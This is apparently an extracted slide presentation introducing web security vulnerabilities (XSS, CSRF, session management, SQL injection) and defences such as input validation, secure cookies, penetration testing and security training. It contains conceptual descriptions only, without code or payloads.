Abdul Wahab's presentation covers topics related to common cybersecurity vulnerabilities and exploits including cross-site scripting, cross-site request forgery, session management, SQL injection, secure software testing, and replicating vulnerabilities. It discusses these topics in detail providing examples of each vulnerability type and strategies to prevent exploits such as input validation, output encoding, secure cookies, penetration testing, and security awareness training. The presentation aims to educate audiences on how these vulnerabilities work and best practices for secure development.
2. TOPICS TO BE COVERED
-CROSS-SITE SCRIPTING
-CROSS SITE REQUEST FORGERY
-SESSION MANAGEMENT
-SQL INJECTION
-SECURE SOFTWARE TESTING
-REPLICATION OF VULNERABILITIES AND
EXPLOITATION
3. CROSS-SITE SCRIPTING
•Cross site scripting (XSS) is an attack in which an
attacker injects malicious executable scripts into the code
of a trusted application or website.
•Attackers often initiate an XSS attack by sending a
malicious link to a user and enticing the user to click it.
4. CONT..
•If the app or website lacks proper data sanitization, the
malicious link executes the attacker’s chosen code on the
user’s system.
•As a result, the attacker can steal the user’s active
session cookie.
5. TYPES
STORE XSS:
Takes place when the malicious payload is stored in a
database. It renders to other users when data is requested—if
there is no output encoding or sanitization.
Reflected XSS:
Occurs when a web application sends attacker-provided
6. TYPES
strings to a victim’s browser so that the browser executes
part of the string as code. The payload echoes back in
response.
DOM-based XSS:
Takes place when an attacker injects a script into a response.
The attacker can read and manipulate the document object
7. TYPES
model (DOM) data to craft a malicious URL. The attacker
uses this URL to trick a user into clicking it. If the user
clicks the link, the attacker can steal the user’s active session
information, keystrokes, and so on.
9. •Ensure that web application development aligns
with OWASP’s XSS Prevention Cheat Sheet.
•After remediation, perform penetration testing to confirm it
was successful.
11. CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces
authenticated users to submit a request to a Web application
against which they are currently authenticated.
CSRF attacks exploit the trust a Web application has in an
authenticated user.
CONT..
12. A Cross Site Request Forgery attack exploits a vulnerability
in a Web application if it cannot differentiate between a
request generated by an individual user and a request
generated by a user without their consent.
CONT…
Social engineering platforms are often used by attackers to
launch a CSRF attack.
13. This tricks the victim into clicking a URL that contains a
maliciously crafted, unauthorized request for a particular
Web application.
TO PERFORM THIS ATTACK
To carry out a successful CSRF attack, consider the following :
•The success of a CSRF attack depends on a user’s session with a
vulnerable application. The attack will only be successful if the
user is in an active session with the vulnerable application
14. •An attacker must find a valid URL to maliciously craft. The
URL needs to have a state-changing effect on the target
application.
CONT..
•An attacker also needs to find the right values for the URL
parameters. Otherwise, the target application might reject
the malicious request.
15. SESSION MANAGEMENT
Session management is used to facilitate secure interactions
between a user and some service or application and applies
to a sequence of requests and responses associated with that
particular user.
16. CONT…
Session tokens serve to identify a user’s session within the
HTTP traffic being exchanged between the application and
all of its users.
Each request and response made will have an associated
session token which allows the application to remember
distinct information about the client using it.
17. CONT…
Each request and response made will have an associated
session token which allows the application to remember
distinct information about the client using it.
Session cookies were designed to help manage sessions
19. P
REVENTIONS
• Setting secure HTTP flags on cookies :
Avoid sending sensitive traffic over unencrypted channels,
i.e. HTTP. Setup the secure flag, which will ensure that data
is transmitted over encrypted protocols such as HTTPS.
20. C
ONT..
• Generation of new session cookies
New session token generation should be ensured at every
step of the authentication and interaction process, i.e. when a
21. CONT…
user visits an application or website and when the user gets
authenticated.
• Session cookies configuration
Session tokens should not be easily guessable, they should be
long, unique and unpredictable. Doing so will decrease the
chances of an attacker being successful in using brute force
22. t
o figure out the session token. The expiration time of
persistent cookies should be no longer than 30 minutes,
SQL INJECTION
•A SQL injection attack consists of insertion or “injection” of a
SQL query via the input data from the client to the application.
23. CONT…
•A successful SQL injection exploit can read sensitive data from
the database, modify database data (Insert/Update/Delete),
execute administration operations on the database (such as
shutdown the DBMS), recover the content of a given file
present on the DBMS file system and in some cases issue
commands to the operating system.
24. CONT…
•SQL injection attacks allow attackers to spoof identity, tamper
with existing data, cause repudiation issues such as voiding
transactions or changing balances, allow the complete disclosure
of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
SQL injection attack occurs when:
25. CONT…
1. An unintended data enters a program from an untrusted
source. 2. The data is used to dynamically construct a SQL query
PREVENTIONS
• Train and maintain awareness
• Don’t trust any user input
26. • U
se whitelists, not blacklists
• Adopt the latest technologies
• Employ verified mechanisms
28. SECURE SOFTWARE TESTING
Cybersecurity has turned into a major concern as hacking
activities have reached threatening levels. It directly causes a
breach against your personal information and it is essential to
understand the different forms of cyber-attacks that can
impact an individual or an organization.
29. C
O
NT…
It is surprising to know that approximately $5.2 trillion in value
would be put at stake due to cyberattacks during the period
between 2019 and 2023.
30. The correct use of software testing measures is seen as the key to
rest
rict hacking incidents. In the past few years, this process has been
gaining popularity and software testing has emerged as a trusted
shield against cyber attacks.
CONT…
You can easily include software testing as part of your
organization’s working model. The most basic step is to hire a
31. team of software experts skilled in security designing.
Fur
thermore, it is important to put in place specific quality criteria
throughout the pipeline for ensuring enhanced safety. This
arrangement will maintain security at all levels as the process
crosses different stages of the pipeline.
33. C
ONT...
PENETRATION TESTING :
Penetration testing is a technique that highly resembles a
cyberattack or actually an intentional cyber-attack made on the
application to identify all the system vulnerabilities. Moreover,
penetration testing is a highly effective practice that helps meet
34. CONT…
the goals related to web application security as it helps to improve
the Web Application Firewall or protection.
Intelligent System Security Checks
Penetration testing is more of a test design arrangement made
to work on security against any attempt made on hacking.
Even the tools used during penetration testing are made to
35. CONT…
replicate the cyber-attacks with the objective of getting over
any system vulnerabilities.
Underline Weak Segments
Another significant aspect of using the penetration testing
approach is to identify weak links within the software code.
The practice improves the scope for protecting the personal
36. CONT…
user data, card details, or any transactional record that might
be at threat.
Added Network Security
Penetration testing is a powerful technique that could help
developers and software testers to work on improving the
high-speed internet like 5G network security as well as
applications running on the network.
38. REPLICATION OF VULNERABILITIES AND
EXPLOITATION
Poor data backup and recovery :
With the recent threat of ransomware looming large, along
with traditional disasters and other failures, organizations
have a pressing need to back up and recover data.
Unfortunately, many organizations don't excel in this area
due to a lack of sound backup and recovery options.
39. PREVENTION
Most organizations need a multi backup and recovery
strategy. This should include data center storage snapshots
and replication, database storage, tape or disk backups, and
end user storage (often cloud-based).
Poor network segmentation and monitoring
Many attackers rely on weak network segmentation and
monitoring to gain full access to systems in a network subnet
40. CONT…
once they've gained initial access. This huge cybersecurity
vulnerability has been common in many large enterprise
networks for many years.
Organizations should focus on carefully controlling network
access among systems within subnets, and building better
detection and alerting strategies for lateral movement
41. PREVENTION
between systems that have no business communicating with
one another.
Weak authentication and credential management
One of the most common causes of compromise and
breaches for this cybersecurity vulnerability is a lack of
sound credential management. People use the same
42. CONT…
password over and over, and many systems and services
support weak authentication practices.
For most organizations, implementing stringent password
controls can help. This may consist of longer passwords,
more complex passwords, more frequent password changes
or some combination of these principles.
43. PREVENTION
Poor security awareness
The most common cause of successful phishing, pretexting
and other social engineering attacks is a lack of sound
security awareness training and end-user validation.
Organizations are still struggling with how to train users to
look for social engineering attempts and report them.
44. CONT…
More organizations need to conduct regular training
exercises, including phishing tests, pretexting and additional
social engineering as needed. Many training programs are
available to help reinforce security awareness concepts